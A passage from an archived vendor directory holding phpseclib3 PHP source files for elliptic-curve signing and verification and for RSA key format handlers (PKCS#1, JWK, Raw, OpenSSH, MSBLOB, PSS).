phpseclib3\Crypt\EC\Formats\Signature\ASN1 as ASN1Signature; use phpseclib3\Crypt\Hash; use phpseclib3\Exception\UnsupportedOperationException; use phpseclib3\Math\BigInteger; /** * EC Private Key * * @author Jim Wigginton */ final class PrivateKey extends EC implements Common\PrivateKey { use Common\Traits\PasswordProtected; /** * Private Key dA * * sign() converts this to a BigInteger so one might wonder why this is a FiniteFieldInteger instead of * a BigInteger. That's because a FiniteFieldInteger, when converted to a byte string, is null padded by * a certain amount whereas a BigInteger isn't. * * @var object */ protected $dA; /** * @var string */ protected $secret; /** * Multiplies an encoded point by the private key * * Used by ECDH * * @param string $coordinates * @return string */ public function multiply($coordinates) { if ($this->curve instanceof MontgomeryCurve) { if ($this->curve instanceof Curve25519 && self::$engines['libsodium']) { return sodium_crypto_scalarmult($this->dA->toBytes(), $coordinates); } $point = [$this->curve->convertInteger(new BigInteger(strrev($coordinates), 256))]; $point = $this->curve->multiplyPoint($point, $this->dA); return strrev($point[0]->toBytes(true)); } if (!$this->curve instanceof TwistedEdwardsCurve) { $coordinates = "\0$coordinates"; } $point = PKCS1::extractPoint($coordinates, $this->curve); $point = $this->curve->multiplyPoint($point, $this->dA); if ($this->curve instanceof TwistedEdwardsCurve) { return $this->curve->encodePoint($point); } if (empty($point)) { throw new \RuntimeException('The infinity point is invalid'); } return "\4" . $point[0]->toBytes(true) . $point[1]->toBytes(true); } /** * Create a signature * * @see self::verify() * @param string $message * @return mixed */ public function sign($message) { if ($this->curve instanceof MontgomeryCurve) { throw new UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } $dA = $this->dA; $order = $this->curve->getOrder(); $shortFormat = $this->shortFormat; $format = $this->sigFormat; if ($format === false) { return false; } if ($this->curve instanceof TwistedEdwardsCurve) { if ($this->curve instanceof Ed25519 && self::$engines['libsodium'] && !isset($this->context)) { $result = sodium_crypto_sign_detached($message, $this->withPassword()->toString('libsodium')); return $shortFormat == 'SSH2' ? Strings::packSSH2('ss', 'ssh-' . strtolower($this->getCurve()), $result) : $result; } // contexts (Ed25519ctx) are supported but prehashing (Ed25519ph) is not. // quoting https://tools.ietf.org/html/rfc8032#section-8.5 , // "The Ed25519ph and Ed448ph variants ... SHOULD NOT be used" $A = $this->curve->encodePoint($this->QA); $curve = $this->curve; $hash = new Hash($curve::HASH); $secret = substr($hash->hash($this->secret), $curve::SIZE); if ($curve instanceof Ed25519) { $dom = !isset($this->context) ? '' : 'SigEd25519 no Ed25519 collisions' . "\0" . chr(strlen($this->context)) . $this->context; } else { $context = isset($this->context) ? $this->context : ''; $dom = 'SigEd448' . "\0" . chr(strlen($context)) . $context; } // SHA-512(dom2(F, C) || prefix || PH(M)) $r = $hash->hash($dom . $secret . $message); $r = strrev($r); $r = new BigInteger($r, 256); list(, $r) = $r->divide($order); $R = $curve->multiplyPoint($curve->getBasePoint(), $r); $R = $curve->encodePoint($R); $k = $hash->hash($dom . $R . $A . $message); $k = strrev($k); $k = new BigInteger($k, 256); list(, $k) = $k->divide($order); $S = $k->multiply($dA)->add($r); list(, $S) = $S->divide($order); $S = str_pad(strrev($S->toBytes()), $curve::SIZE, "\0"); return $shortFormat == 'SSH2' ? Strings::packSSH2('ss', 'ssh-' . strtolower($this->getCurve()), $R . $S) : $R . $S; } if (self::$engines['OpenSSL'] && in_array($this->hash->getHash(), openssl_get_md_methods())) { $signature = ''; // altho PHP's OpenSSL bindings only supported EC key creation in PHP 7.1 they've long // supported signing / verification // we use specified curves to avoid issues with OpenSSL possibly not supporting a given named curve; // doing this may mean some curve-specific optimizations can't be used but idk if OpenSSL even // has curve-specific optimizations $result = openssl_sign($message, $signature, $this->toString('PKCS8', ['namedCurve' => false]), $this->hash->getHash()); if ($result) { if ($shortFormat == 'ASN1') { return $signature; } extract(ASN1Signature::load($signature)); return $shortFormat == 'SSH2' ? $format::save($r, $s, $this->getCurve()) : $format::save($r, $s); } } $e = $this->hash->hash($message); $e = new BigInteger($e, 256); $Ln = $this->hash->getLength() - $order->getLength(); $z = $Ln > 0 ? $e->bitwise_rightShift($Ln) : $e; while (true) { $k = BigInteger::randomRange(self::$one, $order->subtract(self::$one)); list($x, $y) = $this->curve->multiplyPoint($this->curve->getBasePoint(), $k); $x = $x->toBigInteger(); list(, $r) = $x->divide($order); if ($r->equals(self::$zero)) { continue; } $kinv = $k->modInverse($order); $temp = $z->add($dA->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($order); if (!$s->equals(self::$zero)) { break; } } // the following is an RFC6979 compliant implementation of deterministic ECDSA // it's unused because it's mainly intended for use when a good CSPRNG isn't // available. if phpseclib's CSPRNG isn't good then even key generation is // suspect /* // if this were actually being used it'd probably be better if this lived in load() and createKey() $this->q = $this->curve->getOrder(); $dA = $this->dA->toBigInteger(); $this->x = $dA; $h1 = $this->hash->hash($message); $k = $this->computek($h1); list($x, $y) = $this->curve->multiplyPoint($this->curve->getBasePoint(), $k); $x = $x->toBigInteger(); list(, $r) = $x->divide($this->q); $kinv = $k->modInverse($this->q); $h1 = $this->bits2int($h1); $temp = $h1->add($dA->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($this->q); */ return $shortFormat == 'SSH2' ? $format::save($r, $s, $this->getCurve()) : $format::save($r, $s); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePrivateKey'); return $type::savePrivateKey($this->dA, $this->curve, $this->QA, $this->secret, $this->password, $options); } /** * Returns the public key * * @see self::getPrivateKey() * @return mixed */ public function getPublicKey() { $format = 'PKCS8'; if ($this->curve instanceof MontgomeryCurve) { $format = 'MontgomeryPublic'; } $type = self::validatePlugin('Keys', $format, 'savePublicKey'); $key = $type::savePublicKey($this->curve, $this->QA); $key = EC::loadFormat($format, $key); if ($this->curve instanceof MontgomeryCurve) { return $key; } $key = $key ->withHash($this->hash->getHash()) ->withSignatureFormat($this->shortFormat); if ($this->curve instanceof TwistedEdwardsCurve) { $key = $key->withContext($this->context); } return $key; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/Parameters.php000064400000001402147600400120022152 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC; use phpseclib3\Crypt\EC; /** * EC Parameters * * @author Jim Wigginton */ final class Parameters extends EC { /** * Returns the parameters * * @param string $type * @param array $options optional * @return string */ public function toString($type = 'PKCS1', array $options = []) { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); return $type::saveParameters($this->curve, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/PublicKey.php000064400000012502147600400120021741 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\EC; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\EC; use phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use phpseclib3\Crypt\EC\Curves\Ed25519; use phpseclib3\Crypt\EC\Formats\Keys\PKCS1; use phpseclib3\Crypt\EC\Formats\Signature\ASN1 as ASN1Signature; use phpseclib3\Crypt\Hash; use phpseclib3\Exception\UnsupportedOperationException; use phpseclib3\Math\BigInteger; /** * EC Public Key * * @author Jim Wigginton */ final class PublicKey extends EC implements Common\PublicKey { use Common\Traits\Fingerprint; /** * Verify a signature * * @see self::verify() * @param string $message * @param string $signature * @return mixed */ public function verify($message, $signature) { if ($this->curve instanceof MontgomeryCurve) { throw new UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } $shortFormat = $this->shortFormat; $format = $this->sigFormat; if ($format === false) { return false; } $order = $this->curve->getOrder(); if ($this->curve instanceof TwistedEdwardsCurve) { if ($shortFormat == 'SSH2') { list(, $signature) = Strings::unpackSSH2('ss', $signature); } if ($this->curve instanceof Ed25519 && self::$engines['libsodium'] && !isset($this->context)) { return sodium_crypto_sign_verify_detached($signature, $message, $this->toString('libsodium')); } $curve = $this->curve; if (strlen($signature) != 2 * $curve::SIZE) { return false; } $R = substr($signature, 0, $curve::SIZE); $S = substr($signature, $curve::SIZE); try { $R = PKCS1::extractPoint($R, $curve); $R = $this->curve->convertToInternal($R); } catch (\Exception $e) { return false; } $S = strrev($S); $S = new BigInteger($S, 256); if ($S->compare($order) >= 0) { return false; } $A = $curve->encodePoint($this->QA); if ($curve instanceof Ed25519) { $dom2 = !isset($this->context) ? '' : 'SigEd25519 no Ed25519 collisions' . "\0" . chr(strlen($this->context)) . $this->context; } else { $context = isset($this->context) ? $this->context : ''; $dom2 = 'SigEd448' . "\0" . chr(strlen($context)) . $context; } $hash = new Hash($curve::HASH); $k = $hash->hash($dom2 . substr($signature, 0, $curve::SIZE) . $A . $message); $k = strrev($k); $k = new BigInteger($k, 256); list(, $k) = $k->divide($order); $qa = $curve->convertToInternal($this->QA); $lhs = $curve->multiplyPoint($curve->getBasePoint(), $S); $rhs = $curve->multiplyPoint($qa, $k); $rhs = $curve->addPoint($rhs, $R); $rhs = $curve->convertToAffine($rhs); return $lhs[0]->equals($rhs[0]) && $lhs[1]->equals($rhs[1]); } $params = $format::load($signature); if ($params === false || count($params) != 2) { return false; } extract($params); if (self::$engines['OpenSSL'] && in_array($this->hash->getHash(), openssl_get_md_methods())) { $sig = $format != 'ASN1' ? ASN1Signature::save($r, $s) : $signature; $result = openssl_verify($message, $sig, $this->toString('PKCS8', ['namedCurve' => false]), $this->hash->getHash()); if ($result != -1) { return (bool) $result; } } $n_1 = $order->subtract(self::$one); if (!$r->between(self::$one, $n_1) || !$s->between(self::$one, $n_1)) { return false; } $e = $this->hash->hash($message); $e = new BigInteger($e, 256); $Ln = $this->hash->getLength() - $order->getLength(); $z = $Ln > 0 ? $e->bitwise_rightShift($Ln) : $e; $w = $s->modInverse($order); list(, $u1) = $z->multiply($w)->divide($order); list(, $u2) = $r->multiply($w)->divide($order); $u1 = $this->curve->convertInteger($u1); $u2 = $this->curve->convertInteger($u2); list($x1, $y1) = $this->curve->multiplyAddPoints( [$this->curve->getBasePoint(), $this->QA], [$u1, $u2] ); $x1 = $x1->toBigInteger(); list(, $x1) = $x1->divide($order); return $x1->equals($r); } /** * Returns the public key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); return $type::savePublicKey($this->curve, $this->QA, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PKCS1.php000064400000011612147600400120023360 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * PKCS#1 Formatted RSA Key Handler * * @author Jim Wigginton */ abstract class PKCS1 extends Progenitor { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } if (strpos($key, 'PUBLIC') !== false) { $components = ['isPublicKey' => true]; } elseif (strpos($key, 'PRIVATE') !== false) { $components = ['isPublicKey' => false]; } else { $components = []; } $key = parent::load($key, $password); $decoded = ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = ASN1::asn1map($decoded[0], Maps\RSAPrivateKey::MAP); if (is_array($key)) { $components += [ 'modulus' => $key['modulus'], 'publicExponent' => $key['publicExponent'], 'privateExponent' => $key['privateExponent'], 'primes' => [1 => $key['prime1'], $key['prime2']], 'exponents' => [1 => $key['exponent1'], $key['exponent2']], 'coefficients' => [2 => $key['coefficient']] ]; if ($key['version'] == 'multi') { foreach ($key['otherPrimeInfos'] as $primeInfo) { $components['primes'][] = $primeInfo['prime']; $components['exponents'][] = $primeInfo['exponent']; $components['coefficients'][] = $primeInfo['coefficient']; } } if (!isset($components['isPublicKey'])) { $components['isPublicKey'] = false; } return $components; } $key = ASN1::asn1map($decoded[0], Maps\RSAPublicKey::MAP); if (!is_array($key)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (!isset($components['isPublicKey'])) { $components['isPublicKey'] = true; } return $components + $key; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { $num_primes = count($primes); $key = [ 'version' => $num_primes == 2 ? 'two-prime' : 'multi', 'modulus' => $n, 'publicExponent' => $e, 'privateExponent' => $d, 'prime1' => $primes[1], 'prime2' => $primes[2], 'exponent1' => $exponents[1], 'exponent2' => $exponents[2], 'coefficient' => $coefficients[2] ]; for ($i = 3; $i <= $num_primes; $i++) { $key['otherPrimeInfos'][] = [ 'prime' => $primes[$i], 'exponent' => $exponents[$i], 'coefficient' => $coefficients[$i] ]; } $key = ASN1::encodeDER($key, Maps\RSAPrivateKey::MAP); return self::wrapPrivateKey($key, 'RSA', $password, $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e) { $key = [ 'modulus' => $n, 'publicExponent' => $e ]; $key = ASN1::encodeDER($key, Maps\RSAPublicKey::MAP); return self::wrapPublicKey($key, 'RSA'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/JWK.php000064400000011007147600400120023170 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\JWK as Progenitor; use phpseclib3\Math\BigInteger; /** * JWK Formatted RSA Handler * * @author Jim Wigginton */ abstract class JWK extends Progenitor { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); if ($key->kty != 'RSA') { throw new \RuntimeException('Only RSA JWK keys are supported'); } $count = $publicCount = 0; $vars = ['n', 'e', 'd', 'p', 'q', 'dp', 'dq', 'qi']; foreach ($vars as $var) { if (!isset($key->$var) || !is_string($key->$var)) { continue; } $count++; $value = new BigInteger(Strings::base64url_decode($key->$var), 256); switch ($var) { case 'n': $publicCount++; $components['modulus'] = $value; break; case 'e': $publicCount++; $components['publicExponent'] = $value; break; case 'd': $components['privateExponent'] = $value; break; case 'p': $components['primes'][1] = $value; break; case 'q': $components['primes'][2] = $value; break; case 'dp': $components['exponents'][1] = $value; break; case 'dq': $components['exponents'][2] = $value; break; case 'qi': $components['coefficients'][2] = $value; } } if ($count == count($vars)) { return $components + ['isPublicKey' => false]; } if ($count == 2 && $publicCount == 2) { return $components + ['isPublicKey' => true]; } throw new \UnexpectedValueException('Key does not have an appropriate number of RSA parameters'); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { if (count($primes) != 2) { throw new \InvalidArgumentException('JWK does not support multi-prime RSA keys'); } $key = [ 'kty' => 'RSA', 'n' => Strings::base64url_encode($n->toBytes()), 'e' => Strings::base64url_encode($e->toBytes()), 'd' => Strings::base64url_encode($d->toBytes()), 'p' => Strings::base64url_encode($primes[1]->toBytes()), 'q' => Strings::base64url_encode($primes[2]->toBytes()), 'dp' => Strings::base64url_encode($exponents[1]->toBytes()), 'dq' => Strings::base64url_encode($exponents[2]->toBytes()), 'qi' => Strings::base64url_encode($coefficients[2]->toBytes()) ]; return self::wrapKey($key, $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e, array $options = []) { $key = [ 'kty' => 'RSA', 'n' => Strings::base64url_encode($n->toBytes()), 'e' => Strings::base64url_encode($e->toBytes()) ]; return self::wrapKey($key, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/Raw.php000064400000013113147600400120023266 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Math\BigInteger; /** * Raw RSA Key Handler * * @author Jim Wigginton */ abstract class Raw { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!is_array($key)) { throw new \UnexpectedValueException('Key should be a array - not a ' . gettype($key)); } $key = array_change_key_case($key, CASE_LOWER); $components = ['isPublicKey' => false]; foreach (['e', 'exponent', 'publicexponent', 0, 'privateexponent', 'd'] as $index) { if (isset($key[$index])) { $components['publicExponent'] = $key[$index]; break; } } foreach (['n', 'modulo', 'modulus', 1] as $index) { if (isset($key[$index])) { $components['modulus'] = $key[$index]; break; } } if (!isset($components['publicExponent']) || !isset($components['modulus'])) { throw new \UnexpectedValueException('Modulus / exponent not present'); } if (isset($key['primes'])) { $components['primes'] = $key['primes']; } elseif (isset($key['p']) && isset($key['q'])) { $indices = [ ['p', 'q'], ['prime1', 'prime2'] ]; foreach ($indices as $index) { list($i0, $i1) = $index; if (isset($key[$i0]) && isset($key[$i1])) { $components['primes'] = [1 => $key[$i0], $key[$i1]]; } } } if (isset($key['exponents'])) { $components['exponents'] = $key['exponents']; } else { $indices = [ ['dp', 'dq'], ['exponent1', 'exponent2'] ]; foreach ($indices as $index) { list($i0, $i1) = $index; if (isset($key[$i0]) && isset($key[$i1])) { $components['exponents'] = [1 => $key[$i0], $key[$i1]]; } } } if (isset($key['coefficients'])) { $components['coefficients'] = $key['coefficients']; } else { foreach (['inverseq', 'q\'', 'coefficient'] as $index) { if (isset($key[$index])) { $components['coefficients'] = [2 => $key[$index]]; } } } if (!isset($components['primes'])) { $components['isPublicKey'] = true; return $components; } if (!isset($components['exponents'])) { $one = new BigInteger(1); $temp = $components['primes'][1]->subtract($one); $exponents = [1 => $components['publicExponent']->modInverse($temp)]; $temp = $components['primes'][2]->subtract($one); $exponents[] = $components['publicExponent']->modInverse($temp); $components['exponents'] = $exponents; } if (!isset($components['coefficients'])) { $components['coefficients'] = [2 => $components['primes'][2]->modInverse($components['primes'][1])]; } foreach (['privateexponent', 'd'] as $index) { if (isset($key[$index])) { $components['privateExponent'] = $key[$index]; break; } } return $components; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return array */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { if (!empty($password) && is_string($password)) { throw new UnsupportedFormatException('Raw private keys do not support encryption'); } return [ 'e' => clone $e, 'n' => clone $n, 'd' => clone $d, 'primes' => array_map(function ($var) { return clone $var; }, $primes), 'exponents' => array_map(function ($var) { return clone $var; }, $exponents), 'coefficients' => array_map(function ($var) { return clone $var; }, $coefficients) ]; } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @return array */ public static function savePublicKey(BigInteger $n, BigInteger $e) { return ['e' => clone $e, 'n' => clone $n]; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/OpenSSH.php000064400000007771147600400120024031 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\OpenSSH as Progenitor; use phpseclib3\Math\BigInteger; /** * OpenSSH Formatted RSA Key Handler * * @author Jim Wigginton */ abstract class OpenSSH extends Progenitor { /** * Supported Key Types * * @var array */ protected static $types = ['ssh-rsa']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { static $one; if (!isset($one)) { $one = new BigInteger(1); } $parsed = parent::load($key, $password); if (isset($parsed['paddedKey'])) { list($type) = Strings::unpackSSH2('s', $parsed['paddedKey']); if ($type != $parsed['type']) { throw new \RuntimeException("The public and private keys are not of the same type ($type vs $parsed[type])"); } $primes = $coefficients = []; list( $modulus, $publicExponent, $privateExponent, $coefficients[2], $primes[1], $primes[2], $comment, ) = Strings::unpackSSH2('i6s', $parsed['paddedKey']); $temp = $primes[1]->subtract($one); $exponents = [1 => $publicExponent->modInverse($temp)]; $temp = $primes[2]->subtract($one); $exponents[] = $publicExponent->modInverse($temp); $isPublicKey = false; return compact('publicExponent', 'modulus', 'privateExponent', 'primes', 'coefficients', 'exponents', 'comment', 'isPublicKey'); } list($publicExponent, $modulus) = Strings::unpackSSH2('ii', $parsed['publicKey']); return [ 'isPublicKey' => true, 'modulus' => $modulus, 'publicExponent' => $publicExponent, 'comment' => $parsed['comment'] ]; } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param array $options optional * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e, array $options = []) { $RSAPublicKey = Strings::packSSH2('sii', 'ssh-rsa', $e, $n); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $RSAPublicKey; } $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $RSAPublicKey = 'ssh-rsa ' . base64_encode($RSAPublicKey) . ' ' . $comment; return $RSAPublicKey; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { $publicKey = self::savePublicKey($n, $e, ['binary' => true]); $privateKey = Strings::packSSH2('si6', 'ssh-rsa', $n, $e, $d, $coefficients[2], $primes[1], $primes[2]); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/MSBLOB.php000064400000016553147600400120023526 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Exception\UnsupportedFormatException; use phpseclib3\Math\BigInteger; /** * Microsoft BLOB Formatted RSA Key Handler * * @author Jim Wigginton */ abstract class MSBLOB { /** * Public/Private Key Pair * */ const PRIVATEKEYBLOB = 0x7; /** * Public Key * */ const PUBLICKEYBLOB = 0x6; /** * Public Key * */ const PUBLICKEYBLOBEX = 0xA; /** * RSA public key exchange algorithm * */ const CALG_RSA_KEYX = 0x0000A400; /** * RSA public key exchange algorithm * */ const CALG_RSA_SIGN = 0x00002400; /** * Public Key * */ const RSA1 = 0x31415352; /** * Private Key * */ const RSA2 = 0x32415352; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } $key = Strings::base64_decode($key); if (!is_string($key)) { throw new \UnexpectedValueException('Base64 decoding produced an error'); } if (strlen($key) < 20) { throw new \UnexpectedValueException('Key appears to be malformed'); } // PUBLICKEYSTRUC publickeystruc // https://msdn.microsoft.com/en-us/library/windows/desktop/aa387453(v=vs.85).aspx extract(unpack('atype/aversion/vreserved/Valgo', Strings::shift($key, 8))); /** * @var string $type * @var string $version * @var integer $reserved * @var integer $algo */ switch (ord($type)) { case self::PUBLICKEYBLOB: case self::PUBLICKEYBLOBEX: $publickey = true; break; case self::PRIVATEKEYBLOB: $publickey = false; break; default: throw new \UnexpectedValueException('Key appears to be malformed'); } $components = ['isPublicKey' => $publickey]; // https://msdn.microsoft.com/en-us/library/windows/desktop/aa375549(v=vs.85).aspx switch ($algo) { case self::CALG_RSA_KEYX: case self::CALG_RSA_SIGN: break; default: throw new \UnexpectedValueException('Key appears to be malformed'); } // RSAPUBKEY rsapubkey // https://msdn.microsoft.com/en-us/library/windows/desktop/aa387685(v=vs.85).aspx // could do V for pubexp but that's unsigned 32-bit whereas some PHP installs only do signed 32-bit extract(unpack('Vmagic/Vbitlen/a4pubexp', Strings::shift($key, 12))); /** * @var integer $magic * @var integer $bitlen * @var string $pubexp */ switch ($magic) { case self::RSA2: $components['isPublicKey'] = false; // fall-through case self::RSA1: break; default: throw new \UnexpectedValueException('Key appears to be malformed'); } $baseLength = $bitlen / 16; if (strlen($key) != 2 * $baseLength && strlen($key) != 9 * $baseLength) { throw new \UnexpectedValueException('Key appears to be malformed'); } $components[$components['isPublicKey'] ? 'publicExponent' : 'privateExponent'] = new BigInteger(strrev($pubexp), 256); // BYTE modulus[rsapubkey.bitlen/8] $components['modulus'] = new BigInteger(strrev(Strings::shift($key, $bitlen / 8)), 256); if ($publickey) { return $components; } $components['isPublicKey'] = false; // BYTE prime1[rsapubkey.bitlen/16] $components['primes'] = [1 => new BigInteger(strrev(Strings::shift($key, $bitlen / 16)), 256)]; // BYTE prime2[rsapubkey.bitlen/16] $components['primes'][] = new BigInteger(strrev(Strings::shift($key, $bitlen / 16)), 256); // BYTE exponent1[rsapubkey.bitlen/16] $components['exponents'] = [1 => new BigInteger(strrev(Strings::shift($key, $bitlen / 16)), 256)]; // BYTE exponent2[rsapubkey.bitlen/16] $components['exponents'][] = new BigInteger(strrev(Strings::shift($key, $bitlen / 16)), 256); // BYTE coefficient[rsapubkey.bitlen/16] $components['coefficients'] = [2 => new BigInteger(strrev(Strings::shift($key, $bitlen / 16)), 256)]; if (isset($components['privateExponent'])) { $components['publicExponent'] = $components['privateExponent']; } // BYTE privateExponent[rsapubkey.bitlen/8] $components['privateExponent'] = new BigInteger(strrev(Strings::shift($key, $bitlen / 8)), 256); return $components; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @param \phpseclib3\Math\BigInteger $d * @param array $primes * @param array $exponents * @param array $coefficients * @param string $password optional * @return string */ public static function savePrivateKey(BigInteger $n, BigInteger $e, BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '') { if (count($primes) != 2) { throw new \InvalidArgumentException('MSBLOB does not support multi-prime RSA keys'); } if (!empty($password) && is_string($password)) { throw new UnsupportedFormatException('MSBLOB private keys do not support encryption'); } $n = strrev($n->toBytes()); $e = str_pad(strrev($e->toBytes()), 4, "\0"); $key = pack('aavV', chr(self::PRIVATEKEYBLOB), chr(2), 0, self::CALG_RSA_KEYX); $key .= pack('VVa*', self::RSA2, 8 * strlen($n), $e); $key .= $n; $key .= strrev($primes[1]->toBytes()); $key .= strrev($primes[2]->toBytes()); $key .= strrev($exponents[1]->toBytes()); $key .= strrev($exponents[2]->toBytes()); $key .= strrev($coefficients[2]->toBytes()); $key .= strrev($d->toBytes()); return Strings::base64_encode($key); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $n * @param \phpseclib3\Math\BigInteger $e * @return string */ public static function savePublicKey(BigInteger $n, BigInteger $e) { $n = strrev($n->toBytes()); $e = str_pad(strrev($e->toBytes()), 4, "\0"); $key = pack('aavV', chr(self::PUBLICKEYBLOB), chr(2), 0, self::CALG_RSA_KEYX); $key .= pack('VVa*', self::RSA1, 8 * strlen($n), $e); $key .= $n; return Strings::base64_encode($key); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/PSS.php000064400000017053147600400120023211 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\RSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted RSA-PSS Key Handler * * @author Jim Wigginton */ abstract class PSS extends Progenitor { /** * OID Name * * @var string */ const OID_NAME = 'id-RSASSA-PSS'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.113549.1.1.10'; /** * OIDs loaded * * @var bool */ private static $oidsLoaded = false; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = false; /** * Initialize static variables */ private static function initialize_static_variables() { if (!self::$oidsLoaded) { ASN1::loadOIDs([ 'md2' => '1.2.840.113549.2.2', 